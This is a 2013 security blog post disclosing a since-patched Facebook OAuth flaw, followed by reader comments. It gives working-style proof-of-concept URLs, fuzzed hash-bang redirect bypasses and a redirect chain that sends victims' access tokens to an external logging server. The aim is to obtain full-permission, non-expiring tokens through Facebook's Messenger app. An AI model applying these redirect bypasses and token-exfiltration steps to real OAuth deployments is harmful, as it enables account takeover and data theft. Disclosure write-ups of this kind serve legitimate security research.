29 March 2013

Category: Hacks

Hello there,

I’ve decided to share one of my favorite flaws in facebook.com. This flaw essentially let me take over any Facebook account: it let me steal the unique access token that grants full access to the account. To be clear, the victim’s account does not need to have a single installed app for this to work, and the bug works in every browser.

In order for me to exploit this flaw, the victim only needed to visit a particular webpage.

OAuth is used primarily to let apps act on behalf of Facebook users. Generally, a user must allow an application access to their account before it can do anything with it.

Facebook applications request different sets of permissions.

For example, Diamond Dash and Texas Hold’em Poker are only allowed to post basic information to the user’s wall.

I discovered a way to gain full access to the user’s account (i.e. read the inbox/outbox, manage pages, see private photos, etc.) even if they have not installed a single app. With this flaw, the token also has no expiry date: the token in my attack never expires unless the victim changes their password.

The URL of the OAuth dialog looks like this:

https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES

All applications on Facebook have different “app IDs.” For instance, Diamond Dash is designated as “app_id=2” while Texas Hold’em Poker is “app_id=3.”

The next and redirect_uri parameters (next=, redirect_uri=) only allow the domain owned by the app. Thus, because app_id=3 belongs to Texas Hold’em Poker, the next parameter will only accept the zynga.com domain (next=http://zynga.com). If a different domain (e.g. nirgoldshlager.com) is supplied in next or redirect_uri, Facebook refuses the request.

Facebook ties your app_id to the next parameter. After the user grants access, Facebook sends the access token to the owning application via a GET request to that next URL (with response_type=token, the token is carried in the URL fragment of that redirect). Now that we have an idea of how Facebook OAuth works, let’s take a look at my findings. I thought over my options and wondered whether I could redirect the application’s OAuth request to a different next URL. I first tried to change the next parameter to a different domain, but that was blocked. Then I tried to change the next parameter to the facebook.com domain itself, but again I was thwarted with a generic error message.

I discovered that subdomains (e.g. xxx.facebook.com) are permitted, but trying to reach a folder or file on such a subdomain (x.facebook.com/xx/x.php) gets blocked by Facebook. Then I noticed that facebook.com uses a hash sign followed by an exclamation point in its URLs (x.facebook.com/#!/xxxx). So I tried that in the next parameter (next=x.facebook.com/%23!/). Facebook blocked me yet again! Then I put a character between the hash sign and the exclamation point (%23x!), and Facebook let it through.

It looked like regex-based protection.

But wait!

If we use something like https://beta.facebook.com/#xxx!/messages/, Facebook’s front end does not treat it the same way as a real hash-bang (#!), and it will not redirect us to the messages screen. I needed a way around that, so I started fuzzing characters between the hash sign and the exclamation point until my browsers (IE, Chrome, Safari, and Firefox) treated the result like the real #! sequence.

Now, for the fuzzing!

Result:

%23~!   (Works on all browsers)

%23%09! (Works on all browsers)

Cool!

This little trick works on domains like touch.facebook.com/#%09!/, m.facebook.com/#~!/, and virtually any other Facebook mobile or touch domain.

So I was then able to redirect the victim to any file or directory on any Facebook subdomain. After that, I created a Facebook application that redirects the victim to an external website that collects the victim’s access_token.

For Example: (Zynga Texas Holdem OAuth Bypass):

https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token

 

Via the next parameter, Facebook redirects the user to my Facebook application (touch.facebook.com/apps/testestestte). My Facebook application then redirects them to files.nirgoldshlager.com, where the victim’s access_token is saved to a log file (files.nirgoldshlager.com/log.txt).

Amazing! I am now able to steal access tokens for any Facebook application.

But wait (again)!!!

 

HERE COMES THE REAL DEAL:

For the attack to succeed, the victim needs to have used a Facebook application (e.g. Diamond Dash). These apps only have basic permissions. We can extend the scope by requesting new permissions, but that is not very powerful, since the victim still has to accept the new permission prompt.

(https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests)

I wanted something with a lot more power!

I wanted to be able to gain access to inbox/outbox, ad management, photos, videos, and everything else on the victim’s account without the victim having to install an application.

So I started to think: how is this possible? What if I used a different app_id? Maybe the app_id of Facebook Messenger, for example. Do users need to actively permit the Facebook Messenger app within their account?

Nope.

Facebook has built-in applications whose terms users never need to accept. These applications have complete access to any account, and the Facebook Messenger access_token never expires.

It only expires when the victim changes their password, which almost never happens.

PoC (Works on all browsers and doesn’t require an installed application on the victim’s account):

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token

The Facebook Security Team has repaired this bug.

Full list of permissions for the Facebook Messenger app:

ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login

This also works on accounts with 2-step verification enabled: 2-step verification does not stop the stolen access_token from being used.

 


PoC Video: How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account, from Nir on Vimeo.

 

By @Nirgoldshlager

Cya Next time!

4 responses on “How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App “Allow” Interaction)”

  1. Clifford says:

    Nice bro! Keep it up.

  2. […] How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App “Allow… […]

  3. Alex says:

    It’s patched 🙁 The moment these btw awesome articles go online they jump on the problem and fix it within hours. No wonder most people keep it to themselves so they won’t get patched that soon.
    Anyways, good job guys!

  4. stephen says:

    Instead of telling people how to hack a page I need someone to tell me how to unhack. I have been royally hacked recently. I had a page on my account which advertised my business and someone has hacked in and basically substituted their page for mine (the app_id’s are different) however I am unable to do anything about it because the person has added a “phantom” admin to the page and I can’t delete it under admin roles because “save” changes has been disabled. I can’t deactivate the account (submit disabled) and I can’t report a violation because again it doesn’t submit the form. I have no way of letting facebook know I have a problem because I can’t get the forms to send and they don’t provide any other means of communication. I cannot even delete my account! (again submit disabled!). If you know of any forum or techy that has some answers I can use to recover this I would be grateful for an email. I am kinda helpless to this attack right now.
